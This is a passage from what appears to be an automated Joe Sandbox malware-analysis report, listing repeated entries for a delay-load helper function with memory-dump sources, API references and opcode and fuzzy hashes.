                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 838f991f5d5c69fc117ff885fd78958b07f5f4b2325ae156db09f586396545c1
                                                              • Instruction ID: d773eb43e62459701e4622e5b03874a6a7689ec97d58d3e586df9fd09cd4b15e
                                                              • Opcode Fuzzy Hash: 838f991f5d5c69fc117ff885fd78958b07f5f4b2325ae156db09f586396545c1
                                                              • Instruction Fuzzy Hash: 01B092A125A100EC2108A1471946D3B018CC088F16B30942FB805C10C1A848A906093A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDu<C
                                                              • API String ID: 1269201914-3993865770
                                                              • Opcode ID: e0fed94f1e265b979358ea3362cb62e5ede5d990cfae9ccea2971710f810fe0c
                                                              • Instruction ID: ad431b5e1d19c9211bc5a6119496c8e1ca6b2973d068eebe2d9b82dda4debb36
                                                              • Opcode Fuzzy Hash: e0fed94f1e265b979358ea3362cb62e5ede5d990cfae9ccea2971710f810fe0c
                                                              • Instruction Fuzzy Hash: 9BB012C165A200BC3208714B9C03D3F010CC0CAF1E730A62FF814C10C1E94D0D89193E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDu<C
                                                              • API String ID: 1269201914-3993865770
                                                              • Opcode ID: 82ffc0e2221a910be7b9963303a0e1a319d7369c1de94a88bf8d36c3d387628e
                                                              • Instruction ID: 6d27bd7f4e81ba52080c2234e6e5b4b45fc3c5aed59392936cd738b0c248207b
                                                              • Opcode Fuzzy Hash: 82ffc0e2221a910be7b9963303a0e1a319d7369c1de94a88bf8d36c3d387628e
                                                              • Instruction Fuzzy Hash: 53B012C165A100BC310831671C06D3F010CC0C6F1EB30A43FFC20C04C2A84C0E49083E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: FjunC
                                                              • API String ID: 1269201914-662778638
                                                              • Opcode ID: f09ce20d06d19db3d907bbd693986b1952db7c9ae1f8c7228c741d4f58fbd045
                                                              • Instruction ID: 761752fcc748be819cc2da8bfdbf26f5a6adb99ea49bd4f2a46ddb600e8c0047
                                                              • Opcode Fuzzy Hash: f09ce20d06d19db3d907bbd693986b1952db7c9ae1f8c7228c741d4f58fbd045
                                                              • Instruction Fuzzy Hash: 65B012C165A100BD310871971C06D3B014CC0C8F1A730A42FF804C20C1E84C0D05193E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: FjunC
                                                              • API String ID: 1269201914-662778638
                                                              • Opcode ID: a4dce14e65603bf6bcba94acf3175e7ce417f6bda846abc9c84c375310dc9162
                                                              • Instruction ID: 8ab9c2e631b9bc6be988c17a9ed8c95850283eec8939588e4464d9177b9bc938
                                                              • Opcode Fuzzy Hash: a4dce14e65603bf6bcba94acf3175e7ce417f6bda846abc9c84c375310dc9162
                                                              • Instruction Fuzzy Hash: B8B012C165A100BC310871D75D46D3B015CC0C8F1A730A62FF804C20C1ED4C0E06093E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: FjunC
                                                              • API String ID: 1269201914-662778638
                                                              • Opcode ID: 18d907751d56aa054ac9dc2c19e72e6e0b8b6fa804951d4dcdc8d086934ea5d5
                                                              • Instruction ID: 2a083ac33bf98296aaab118ef4cf89bc4728391b7cfac9c99fc56783d5f40b31
                                                              • Opcode Fuzzy Hash: 18d907751d56aa054ac9dc2c19e72e6e0b8b6fa804951d4dcdc8d086934ea5d5
                                                              • Instruction Fuzzy Hash: F9B012C165A200BC314871979C07D3B015CC0C8F1A730A62FF804C20C1E94C0D450A3E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: e381a07fe184f5364b7dbb75882e5f039f6867ef67611ced36ab2a496320ebcd
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: e381a07fe184f5364b7dbb75882e5f039f6867ef67611ced36ab2a496320ebcd
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 3a8bab57e7b02f6edaebdc728751b66e987024b98c66b74e22e0319d0e3e3bf8
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 3a8bab57e7b02f6edaebdc728751b66e987024b98c66b74e22e0319d0e3e3bf8
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: cb0b3604cb05e261e6b01402a465cdd7ddfad9e1f021e4f9c654dc00f34692a5
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: cb0b3604cb05e261e6b01402a465cdd7ddfad9e1f021e4f9c654dc00f34692a5
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 2a0977afea9fdc0c4edde90bcafeb07581afc4734d4b4f0b96a1f569ffc636d0
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 2a0977afea9fdc0c4edde90bcafeb07581afc4734d4b4f0b96a1f569ffc636d0
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 20039d108c31570958e7e57ab5819dfc74179d1764a1c56e4f9e8cbe9e011ecb
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 20039d108c31570958e7e57ab5819dfc74179d1764a1c56e4f9e8cbe9e011ecb
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 0ea4249b0fcd4478d4f70a37a8f9f6a24fa920fb1a14f8baac8e33bcebab6b08
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 0ea4249b0fcd4478d4f70a37a8f9f6a24fa920fb1a14f8baac8e33bcebab6b08
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: cbb0486c7fd03f9d63bae8952f5dec1d9425bbfe20c9b514c264149870839d09
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: cbb0486c7fd03f9d63bae8952f5dec1d9425bbfe20c9b514c264149870839d09
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 0e4ac223e9f9249b293b85af0591a8274a35d3cd37cb4c4dd5cbfbd512a676da
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 0e4ac223e9f9249b293b85af0591a8274a35d3cd37cb4c4dd5cbfbd512a676da
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: C
• API String ID: 1269201914-1915930400
• Opcode ID: 4a53e3681519544c475d42b6455ce5426bea97601b19bb655130be08534be512
• Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
• Opcode Fuzzy Hash: 4a53e3681519544c475d42b6455ce5426bea97601b19bb655130be08534be512
• Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: C
• API String ID: 1269201914-1915930400
• Opcode ID: ade1b7697b72d5e43e2e770d3abcef0aef6d3a0a51eef68b1c6ee9e2155b6e69
• Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
• Opcode Fuzzy Hash: ade1b7697b72d5e43e2e770d3abcef0aef6d3a0a51eef68b1c6ee9e2155b6e69
• Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
